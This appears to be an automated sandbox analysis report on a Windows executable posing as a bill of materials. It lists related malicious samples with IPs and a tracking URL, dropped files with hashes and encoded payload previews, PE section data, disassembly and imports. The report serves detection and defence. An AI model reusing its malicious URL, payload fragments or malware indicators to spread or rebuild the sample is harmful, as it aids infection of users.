                      http://url103.dignitycampaign.net/ls/click?upn=u001.Cas5ugePNtSf1mSWabrqo3mcJtdueilvOPTgzdlEpUd4GqCBNMVtW-2F-2F2wgGqCLpTN6dAfdijLlYq9iwquJXmE-2BZj79F37Z0CckED5TsG4fQ25o-2Fg-2FPDuwQBBWHkJ8RPrCF5saPUwaAjeZZiD8h-2FB9W48m4tIaN6GGErXkSFKFmDgBEYW1T7k-2FnXnvn8ldLi-2FIdfk0aRSirefRJxNUdOIGpZfncANcS7uFNatgOPxV2Ygm6fLOUWLotwEqsin4Y1CmtZ7BxfF5foNolE-2Boa25K-2B7wPI3V-2B767Ve4mOhPgJzLgSnGmthLVhWy6BYQf00QNI659fk8q12w02DBMlmMrw3khDr3cnNgYYng2Y5i7BXuipr6DyeGT98fM-2FKBVEQSrbKIquH3JWJaaXzReEynWFW3nTYFz4s5xNRnFU5AokDAcZstvVwxKq-2FJ1IjM1twMf6Hwg_J4YDns4pksLrb17hOXi2aOEwqj3m3dsJSi8gSl9zOoLhblODLjz6IKGTmKF92YKf5UEx9qOPJhvHxt6OvXPWhTIMtIICg1dYT0JxHA0xPVOIL6-2FatGunkes1VHfyRgkBTjXb0N8OIv5rbfThOrNJV8o4LJaaqlIOJB8KNeMcZLv1BO01a-2BZFPSvVNpAIaUaUnS-2BTtMnNrsqDBXNDQiQ2C60GIMOxXkEBDcUqmXWKAXHT2jyJKnE-2BTVX7Dn6v15EXXnFGV7DsBJuyOfxy4Jpp-2FDgxjoJYvwKKleeNMeZbnV7GSaFm53K3rrMP7FHypDrTj5gZolkQN74G665MiZOGOEsJpZBxGWUmRe5KD1lnqv9UsmS5oXGuT59ef-2B-2BOIJwozGuQ8LcLU9sq2bhaxr5QKojdGSLYHkQV48pY3diE-2FSKipsOxgeSp8hri35emljCrDJ8o2gvEcqTrgSbi5z9cBSKny1JK-2FAw-2B-2Bt5GdKd66pp3fqQXb-2FO03pmb7PSvgIGO-2BeUcgeDGkShCS6uwIbaWf92ZS-2BRnf-2BH4JXvcFqQFMHG6QluReLkOtpCzV5c3fz0XkA9GRQTJKj7LLrgRu3TEig-3D-3DGet hashmaliciousUnknownBrowse
                      • 65.9.66.24
                      Documentacao e embarque.ppamGet hashmaliciousRevengeRATBrowse
                      • 18.228.165.84
                      gessner@mativ.com.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 13.52.156.46
                      att001.htmGet hashmaliciousUnknownBrowse
                      • 108.143.98.151
                      hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 13.60.64.14
                      hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 13.60.64.14

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\A7b2-53

                      Download File
                      Process:C:\Windows\SysWOW64\rasdial.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.1239949490932863
                      Encrypted:false
                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                      MD5:271D5F995996735B01672CF227C81C17
                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\aut40FF.tmp

                      Download File
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):286208
                      Entropy (8bit):7.9942073650031515
                      Encrypted:true
                      SSDEEP:6144:YxkBUCkgVVK7nZUcjM0Q10Ds+4KjZMBTzFl/r95IHluMN:YxkRg7nGyM0Qos+ZMtyuMN
                      MD5:9600EA162B57BF8F8B4DB5C90257F093
                      SHA1:2A2069393EFB940B849F9A949746D8EA37E58F64
                      SHA-256:7AB5F0B3B8F1E1D7D8AD48D9352C72D0A30185D65734F007A86F2D24E599468E
                      SHA-512:C0B9BF449B3625A93D3C5FECF7BA9A2C23955A45F52191A06BA225E04ACF9BECC153232ED5A1FF841EFC483248E069D8279570966B3CCE65D2F23F9CE87BD580
                      Malicious:false
                      Reputation:low
                      Preview:...d.CXOJ..S...w.QR...pLB...ZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67C.OJLFX.FE.0.g.Pz.b.'#?h7('"#X&f20XY,,o()h5/&e8Wk....Z,<*dAEM~HEQ9KFQ(7>.e/-.u'=.x1^.\....#?.P..f(".#..mVP..&)$u'=.EQ9KFQQ6g.XO.MIG....9KFQQ67C.OHMCFQHE.=KFQQ67CXOzYHGZXEQ9+BQQ6wCX_JLHEZHCQ9KFQQ61CXOJLHGZ(AQ9IFQQ67CZO..HGJHEA9KFQA67SXOJLHGJHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9Kh%4NCCXO^.LGZXEQ9.BQQ&7CXOJLHGZHEQ9KfQQV7CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJL

                      C:\Users\user\AppData\Local\Temp\aut413F.tmp

                      Download File
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):43568
                      Entropy (8bit):7.822289321002139
                      Encrypted:false
                      SSDEEP:768:yGdfijU9UwtZH7vE+Aj2F60EvOeLgVXVkM/ZlTCzOWncIPFwxL:Dxx/E+Q0s0Fz0cI9wxL
                      MD5:EE2187DC8692654D950020BE4F70F240
                      SHA1:D28C86EBE22CC8C4903492DFF725E9923901E2CD
                      SHA-256:1263FD8C5397643A1A5BDF5448413AE72E42DC5D3DCA5F50D0CB5560A43494E7
                      SHA-512:C7D9360CF325916D00918EF84E9AC5DEE2445EE7DD83E0774180AF78AF3F3B48A1DE1ACBA7CF82FE2C85DB166638E6FFE7175FB2C6C1FE75E1D355D7BFDB9DE0
                      Malicious:false
                      Reputation:low
                      Preview:EA06..P...(.y.*g5.L...6.P..Z..gP..).9.>m5..t....H.L.....3.P...<.aO.6f.9..3....*..qS...i...B..*s9.Zg0...@...g6..*3.\.iP..i.9..g4.M..I.Zg6...P.J.3..1............6qP..j....iW..*..d.eS.Lh39..g2..F.P.:.3.T...jg6.......3..fsZT.p..T..*..[6.M....$...7...*g6..)39.6g9...I.....M.5...3..(.9...EV.'*T.aX..).9....TVfs.l.iI.M)..d.gA.L..i....pQ@.*...N.o.!....3.T@(.,.kG..(.......L.u9....U@...b..x..J....dM*.9..g9..(......fL..J ..B.l..g6..*..P..T.M).9..g2.M.U...3.R.x....U.8j..z....5Y.......0...6.P@Q*... .ci....S(@.U,...!)`C,....l.*. ..6...N...S.E !....L..AE....L. I.&m2...eJ..f..x....3j......O.!..(.`Qfs:|.gI.L.@..X.B..) &P..E..@$...6..@W...mL.t...T.....*b.6..&...Nm6.......6....^..cN...S9..."..* ....).9...E..@....W..f.i..Y6....p.D....:.....O.?.b`.&...T....X....9......(.@.j......j...C.5.... ....q@!.0......J8....Qf.j\.mD...i.*m1..$U.$j..'.<..a...r.&......m3..j..Eh.....3 0.3....@.....P...&@.L...T0&..!...0...-.r...6d.jR./P.......U......P.l ..6..@*....!..%H...7.DH.Q3...T`......

                      C:\Users\user\AppData\Local\Temp\bohmite

                      Download File
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):286208
                      Entropy (8bit):7.9942073650031515
                      Encrypted:true
                      SSDEEP:6144:YxkBUCkgVVK7nZUcjM0Q10Ds+4KjZMBTzFl/r95IHluMN:YxkRg7nGyM0Qos+ZMtyuMN
                      MD5:9600EA162B57BF8F8B4DB5C90257F093
                      SHA1:2A2069393EFB940B849F9A949746D8EA37E58F64
                      SHA-256:7AB5F0B3B8F1E1D7D8AD48D9352C72D0A30185D65734F007A86F2D24E599468E
                      SHA-512:C0B9BF449B3625A93D3C5FECF7BA9A2C23955A45F52191A06BA225E04ACF9BECC153232ED5A1FF841EFC483248E069D8279570966B3CCE65D2F23F9CE87BD580
                      Malicious:false
                      Reputation:low
                      Preview:...d.CXOJ..S...w.QR...pLB...ZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67C.OJLFX.FE.0.g.Pz.b.'#?h7('"#X&f20XY,,o()h5/&e8Wk....Z,<*dAEM~HEQ9KFQ(7>.e/-.u'=.x1^.\....#?.P..f(".#..mVP..&)$u'=.EQ9KFQQ6g.XO.MIG....9KFQQ67C.OHMCFQHE.=KFQQ67CXOzYHGZXEQ9+BQQ6wCX_JLHEZHCQ9KFQQ61CXOJLHGZ(AQ9IFQQ67CZO..HGJHEA9KFQA67SXOJLHGJHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9Kh%4NCCXO^.LGZXEQ9.BQQ&7CXOJLHGZHEQ9KfQQV7CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJL

                      C:\Users\user\AppData\Local\Temp\emboweling

                      Download File
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:dropped
                      Size (bytes):86022
                      Entropy (8bit):4.179101597380809
                      Encrypted:false
                      SSDEEP:1536:hGpoevM7eXGtdA2kxM8gAAeRiA6wKeQjXsDjRx:s9ZWfixiAP6dEv
                      MD5:236D13EAFB078725E5CACFE17C2273CD
                      SHA1:628515E753BA585221783A06BD17FE7B6DC50224
                      SHA-256:73E5716EDFB043BC7033817BECF4B5AF9AA8B5FDB052D23EE3EA38FD6EAF9C9A
                      SHA-512:5CCA7449BD9A9FBBA66835363F00CE565FB65E1697FEAF71AF0983DA62F2EE168DFF07B7983D6B992B6F39CA2CC5DF6848AE1BF2BC24E175818F56949ADBC17F
                      Malicious:false
                      Reputation:low
                      Preview:30G78J35L35Z38G62B65V63P38H31O65K63H63V63F30I32K30C30C30G30O35L36S35X37S62X38S36T62G30B30S30V30M30V30L36E36O38H39K34P35H38F34V62K39V36U35U30G30W30K30A30F30O36Q36Q38P39T34P64W38U36E62S61A37E32W30C30E30A30Z30R30C36Z36A38Z39I35A35J38A38R62R38P36N65W30I30Z30I30K30B30J36J36I38M39W34D35R38N61Y62L39Z36C35P30G30Z30F30J30X30H36H36R38Y39M34I64M38P63A62F61Q36V63E30B30B30A30N30K30P36O36Y38Q39I35E35G38D65W62F38N33S33D30C30U30Z30U30H30N36P36V38F39V34T35C39J30D62F39Z33D32Z30D30I30B30N30K30G36G36W38Y39W34T64N39C32X62Q61B32H65K30Y30C30V30G30T30Y36S36W38U39O35G35S39M34Z62A38P36S34N30N30O30B30N30W30B36P36K38Z39S34K35X39U36X62C39E36W63S30X30F30J30N30A30L36V36N38K39E34T64B39X38I62N61J36Y63G30Z30O30V30J30D30U36X36W38C39G35T35P39N61E33O33I63B30U36V36K38P39I34T35Z39E63H62C39U36R65Q30U30X30N30L30C30U36X36T38J39H38X64P34S34S66O66O66Q66P66S66S62X61N37B34E30U30R30Q30N30A30N36M36F38E39K39U35V34W36X66F66W66I66I66G66O62W38X36T34P30D30O30S30T30Y30G36B36W38R39T38V35T34R38M66B66B66X66T66Q66L62X39G36U63B30C30Z30N30Z30H3

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.165519905979454
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Copy of 01. Bill of Material - 705.exe
                      File size:1'247'232 bytes
                      MD5:806f72c900778deccf64f8a4ec8cdbc9
                      SHA1:d2bcb914eae4d432183d980ea19bee69f4b2d4fe
                      SHA256:642475685812ab7bbc355bb0012722266572aeadc8af18e4a4b0498229deb385
                      SHA512:95515bb78e021964efc1f0e7b17dd4721d76ab99ade61728eab4aeb2018842cb532028760e7145f1259215bcac0728d5a689b0ce7953bfb6267d40021550e45c
                      SSDEEP:24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8ahZqIe30p:+TvC/MTQYxsWR7ahZBM0
                      TLSH:6C45CF037391D062FF9B91334B9AF6124BBC6A660123E51F13981DB9BE701B1563E7A3
                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                      File Icon

                      Icon Hash:3a624e6e6ed8e28d

                      Static PE Info

                      General

                      Entrypoint:0x420577
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66C7BE4F [Thu Aug 22 22:40:15 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:948cc502fe9226992dce9417f952fce3

                      Entrypoint Preview

                      Instruction
                      call 00007F2CD4E99413h
                      jmp 00007F2CD4E98D1Fh
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F2CD4E98EFDh
                      mov dword ptr [esi], 0049FDF0h
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FDF8h
                      mov dword ptr [ecx], 0049FDF0h
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F2CD4E98ECAh
                      mov dword ptr [esi], 0049FE0Ch
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FE14h
                      mov dword ptr [ecx], 0049FE0Ch
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      and dword ptr [eax], 00000000h
                      and dword ptr [eax+04h], 00000000h
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      add eax, 04h
                      push eax
                      call 00007F2CD4E9BABDh
                      pop ecx
                      pop ecx
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      lea eax, dword ptr [ecx+04h]
                      mov dword ptr [ecx], 0049FDD0h
                      push eax
                      call 00007F2CD4E9BB08h
                      pop ecx
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      push eax
                      call 00007F2CD4E9BAF1h
                      test byte ptr [ebp+08h], 00000001h
                      pop ecx

                      Rich Headers

                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x59d94.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x12e0000x7594.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xd40000x59d940x59e00eade62fa03b6e764e7a0f286d0b1e6f3False0.9653870392906815data7.955835081778554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x12e0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xd44b80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                      RT_ICON0xd45e00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                      RT_ICON0xd47080x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                      RT_ICON0xd48300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.3177767354596623
                      RT_ICON0xd58d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.5721311475409836
                      RT_ICON0xd62600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5709219858156028
                      RT_MENU0xd66c80x50dataEnglishGreat Britain0.9
                      RT_STRING0xd67180x594dataEnglishGreat Britain0.3333333333333333
                      RT_STRING0xd6cac0x68adataEnglishGreat Britain0.2735961768219833
                      RT_STRING0xd73380x490dataEnglishGreat Britain0.3715753424657534
                      RT_STRING0xd77c80x5fcdataEnglishGreat Britain0.3087467362924282
                      RT_STRING0xd7dc40x65cdataEnglishGreat Britain0.34336609336609336
                      RT_STRING0xd84200x466dataEnglishGreat Britain0.3605683836589698
                      RT_STRING0xd88880x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                      RT_RCDATA0xd89e00x54e4cdata1.0003335979109869
                      RT_GROUP_ICON0x12d82c0x30dataEnglishGreat Britain0.9583333333333334
                      RT_GROUP_ICON0x12d85c0x14dataEnglishGreat Britain1.25
                      RT_GROUP_ICON0x12d8700x14dataEnglishGreat Britain1.15
                      RT_GROUP_ICON0x12d8840x14dataEnglishGreat Britain1.25
                      RT_VERSION0x12d8980x10cdataEnglishGreat Britain0.5970149253731343
                      RT_MANIFEST0x12d9a40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                      Imports

                      DLLImport
                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                      PSAPI.DLLGetProcessMemoryInfo
                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                      UxTheme.dllIsThemeActive
                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, 